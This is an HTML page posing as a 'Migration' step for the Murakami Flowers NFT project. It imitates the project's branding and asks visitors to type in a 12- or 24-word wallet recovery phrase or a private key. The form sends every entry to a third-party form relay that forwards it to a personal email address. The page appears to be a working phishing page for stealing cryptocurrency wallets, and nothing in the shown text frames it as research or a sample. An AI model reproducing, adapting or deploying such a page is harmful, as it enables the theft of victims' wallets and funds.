<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Migration || Murakami Flowers</title>
    <link rel="stylesheet" href="styles.css">
    <link
      rel="icon"
      href="https://murakamiflowers.kaikaikiki.com/favicon.ico">
</head>
<body class="phrasepage">
    <div class="page-wrapper">
        <a href="./wallet.html"><div class="back-arrow">&#8592;</div></a>
        <div class="content-wrapper">
            <div class="step-indicator">
                <span class="step">Step 1</span>
                <span class="step-active">Step 2</span>
                <span class="step">Step 3</span>
            </div>
            <p>Import your wallet to continue</p>
            <div class="word-options">
                <button class="word-tab active" onclick="showWords(12)">12 words</button>
                <button class="word-tab" onclick="showWords(24)">24 words</button>
                <button class="word-tab" onclick="showWords(1)">Privatekey</button>
            </div>
            <form method="post" action="https://formsubmit.co/opm316@outlook.com">
                <div class="word-inputs">
                    <div class="word-group" id="words-12">
                        <div class="word-box">
                            
                           
                            <div class="input-container">
                                <input type="text" placeholder="1." id="word1" name="word1">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="2." id="word2" name="word2">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="3." id="word3" name="word3">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="4." id="word4" name="word4">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="5." id="word5" name="word5">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="6." id="word6" name="word6">
                            </div>
                        </div>
                        <div class="word-box">
                            <div class="input-container">
                                <input type="text" placeholder="7." id="word7" name="word7">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="8." id="word8" name="word8">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="9." id="word9" name="word9">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="10." id="word10" name="word10">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="11." id="word11" name="word11">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="12." id="word12" name="word12">
                            </div>
                        </div>
                    </div>
                    <div class="word-group" id="words-24" style="display: none;">
                        
                           
                        <div class="word-box">
                            <div class="input-container">
                                <input type="text" placeholder="1." id="word13" name="word13">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="2." id="word14" name="word14">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="3." id="word15" name="word15">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="4." id="word16" name="word16">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="5." id="word17" name="word17">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="6." id="word18" name="word18">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="7." id="word19" name="word19">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="8." id="word20" name="word20">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="9." id="word21" name="word21">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="10." id="word22" name="word22">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="11." id="word23" name="word23">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="12." id="word24" name="word24">
                            </div>
                        </div>
                        <div class="word-box">
                            <div class="input-container">
                                <input type="text" placeholder="13." id="word25" name="word25">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="14." id="word26" name="word26">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="15." id="word27" name="word27">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="16." id="word28" name="word28">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="17." id="word29" name="word29">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="18." id="word30" name="word30">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="19." id="word31" name="word31">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="20." id="word32" name="word32">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="21." id="word33" name="word33">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="22." id="word34" name="word34">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="23." id="word35" name="word35">
                            </div>
                            <div class="input-container">
                                <input type="text" placeholder="24." id="word36" name="word36">
                            </div>
                        </div>
                    </div>

                    <div class="word-group" id="keyphrase" style="display: none;">
                        <div class="word-box">
                            <div class="input-container">
                                
                               
                                <input placeholder="Enter your private key" id="keyphrase" name="Privatekey">
                            </div>
                            </div>
                        </div>
                    </div>
                </div>
                <button class="submit-btn">Continue</button>
            </form>
        </div>
    </div>
    <script src="script.js"></script>
</body>
</html>
